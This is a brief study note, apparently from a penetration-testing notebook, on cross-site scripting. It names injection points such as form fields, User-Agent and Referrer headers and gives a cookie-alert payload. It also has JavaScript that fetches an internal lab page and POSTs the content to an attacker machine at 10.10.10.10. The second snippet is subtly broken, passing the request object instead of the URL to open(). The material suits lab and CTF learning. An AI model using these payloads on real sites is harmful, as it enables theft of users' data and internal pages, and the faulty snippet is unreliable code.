XSS
Cross-Site Scripting is a web attack in which the attacker might be able to inject the malicious javascript code for the benefit of the attacker
<script>alert(document.cookie)</script>
- All fields in the form submission
- User-Agent
- Referrer Headers
- Create requests with
XMLHTTPRequest()
to request a webpage
var url1 = "http://internal.dnoscp.htb";
var req1 = new XMLHttpRequest();
req1.open("GET", url1, false); // open(<request method>, <target url>, <go to next withoput completing this line>)
req1.send();
var resp1 = req1.responseText;
- With the content of the requested webpage stored in the variable resp1, it can be sent to the attacker with another request from js to the attacker machine
var url2 = "http://10.10.10.10";
var req2 = new XMLHttpRequest();
req2.open("POST", req2, false);
req2.send(resp1);
Last modified 11mo ago